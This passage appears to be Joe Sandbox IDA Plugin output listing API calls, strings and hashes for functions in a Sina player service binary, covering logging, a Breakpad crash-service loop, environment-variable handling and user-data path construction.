                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372555
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372566
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372576
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372581
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037259F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003725AE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003725FC
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372608
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372611
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 0037262B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372634
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037265A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$??3@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$discontructor
                                                                                                                                                                                                    • API String ID: 3690423324-3705599970
                                                                                                                                                                                                    • Opcode ID: 33e57d67cc68a611ba104d243e2cb1b9466157f097e844e972f937771bae7f39
                                                                                                                                                                                                    • Instruction ID: bbc8e9f73d2a35c1bfbd3c6052998845cab155283dc2300380989dd1dbb180ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e57d67cc68a611ba104d243e2cb1b9466157f097e844e972f937771bae7f39
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30617471900248DFDF22DF64DD4AB9DBBB8FB05304F004999E40AA7291DB75AA48CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038CD00
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0038CD14
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0038CD1A
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038CD2A
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038CD3D
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000200,000000FF), ref: 0038CD59
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038CD9D
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 0038CDB2
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038CDCA
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000205,000000FF), ref: 0038CDEA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(dumps reported :,?), ref: 0038CE30
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE41
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE52
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE63
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038CE7C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??6?$basic_ostream@D@std@@@std@@MessageMessage@logging@@U?$char_traits@V01@$Helper@logging@@LevelVlog$DispatchSleepTranslate
                                                                                                                                                                                                    • String ID: clients terminated :$dumps reported :$dumps serviced :$breakpad\tools\crash_service.cc$clients connected :$session ending..$Vll
                                                                                                                                                                                                    • API String ID: 455675919-1082587121
                                                                                                                                                                                                    • Opcode ID: a4518e4d9edee99ce8bfcfb53ab38204b52e80b6ed0b3535b819268a987fc6fe
                                                                                                                                                                                                    • Instruction ID: 1023872722688ff773801679e0d18ab813d581064dac8bcee7709f0becaee6b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4518e4d9edee99ce8bfcfb53ab38204b52e80b6ed0b3535b819268a987fc6fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151D572E10308ABCF12EBA4EC46F9EBBA8FB04354F140665E515E72D0DB75A904CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbschr.MSVCR120(00000000,0000003D,00ED4598,00000000,00000000,00000000), ref: 6C580F4E
                                                                                                                                                                                                      • Part of subcall function 6C5812F9: _mbschr_l.MSVCR120(00000000,00ED4598,00000000,?,6C580F53,00000000,0000003D,00ED4598,00000000,00000000,00000000), ref: 6C581304
                                                                                                                                                                                                    • free.MSVCR120(00000000,00ED4598,00000000,00000000,00000000), ref: 6C580FA9
                                                                                                                                                                                                    • _errno.MSVCR120(00ED4598,00000000,00000000,00000000), ref: 6C580FBE
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6C5B05EA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6C5B05F5
                                                                                                                                                                                                    • ___wtomb_environ.LIBCMT ref: 6C5B0626
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B064D
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B066A
                                                                                                                                                                                                    • free.MSVCR120(00ED4C78,00ED4598,00000000,00000000,00000000), ref: 6C5B0698
                                                                                                                                                                                                    • __recalloc_crt.LIBCMT(00000001,00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B06CE
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000001,?,00000000,00000000), ref: 6C5B0735
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000001,?,00000000,00000000), ref: 6C5B073F
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,00000000,00000000), ref: 6C5B074E
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000002,00000000,?,00000000,00000000), ref: 6C5B0759
                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 6C5B077C
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,00000000), ref: 6C5B078A
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,00000000,00000000), ref: 6C5B0796
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000), ref: 6C5B07A3
                                                                                                                                                                                                      • Part of subcall function 6C580EE6: _mbsnbicoll.MSVCR120(00000000,00000000,00ED4598,00ED4C78,00000000,?,6C580F92,00000000,00000000,00ED4598,00000000,00000000,00000000), ref: 6C580F01
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6C5B07BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_errno$_malloc_crtstrlen$EnvironmentVariable___wtomb_environ__recalloc_crt_calloc_crt_invalid_parameter_noinfo_invoke_watson_mbschr_mbschr_l_mbsnbicollstrcpy_s
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 1943959764-2859553101
                                                                                                                                                                                                    • Opcode ID: d70f6c83849010633ca2f9b93cec3da04a8334b39ef6933848d22eb1b0f38a86
                                                                                                                                                                                                    • Instruction ID: e6aead62b99ee8abc7e759eebefa929010e986087a795ab4cefaa79028e373bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d70f6c83849010633ca2f9b93cec3da04a8334b39ef6933848d22eb1b0f38a86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C27108B1506362EFEB019F79DE50B9A7B74EBC2368F204617D810A7A90D734D841CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,User Data,User Data), ref: 0037FA5E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FA67
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FA70
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037FA86
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,version_cfg,version_cfg), ref: 0037FAE5
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FAEE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FAF7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037FB06
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Get@PathPath@base@@@Service@@
                                                                                                                                                                                                    • String ID: Sina$SinaPlayer$User Data$version_cfg
                                                                                                                                                                                                    • API String ID: 160063777-2757115113
                                                                                                                                                                                                    • Opcode ID: f3762bbf50005efcf99a127fba71b9b072d7d8d70e2abf8195efe2a732e96c83
                                                                                                                                                                                                    • Instruction ID: 036611f6fd7d163ada6af55d44de9b5c9cbc37112dd5ae900cdf8da7ee9e772a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3762bbf50005efcf99a127fba71b9b072d7d8d70e2abf8195efe2a732e96c83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8171E375910248DFCF16EBE4C855BEEBBB9FF05318F15416DD40A67280EB791A04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C64C
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C66F
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C6A9
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C6F6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C716
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C733
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037C756
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C767
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C781
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C792
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C79A
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037C7B8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037C7C7
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C82A
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C836
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C83F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@V01@_
                                                                                                                                                                                                    • String ID: failed_times = $)#sinaclient#[$)- $TerminateUploadThread need_upload = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 4049907418-1469293971
                                                                                                                                                                                                    • Opcode ID: a7c4367f8f389b9ff6f1d1aae1928f18f5a648887ddbf6d70ce7a9fc8b6cf344
                                                                                                                                                                                                    • Instruction ID: 4c3d4c4861d58be216c630808e000d6e47bb887b5bdf9718305e1a2a15da6ae5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7c4367f8f389b9ff6f1d1aae1928f18f5a648887ddbf6d70ce7a9fc8b6cf344
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57516075900249DFDF22EFA4DD0ABDDBBB8FB04304F00859AE409AB291DB759A44CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00371EF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00371F13
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00371F4D
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00371F84
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00371FA1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00371FBE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00371FE1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00371FF2
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372002
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037200D
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037202B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037203A
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372088
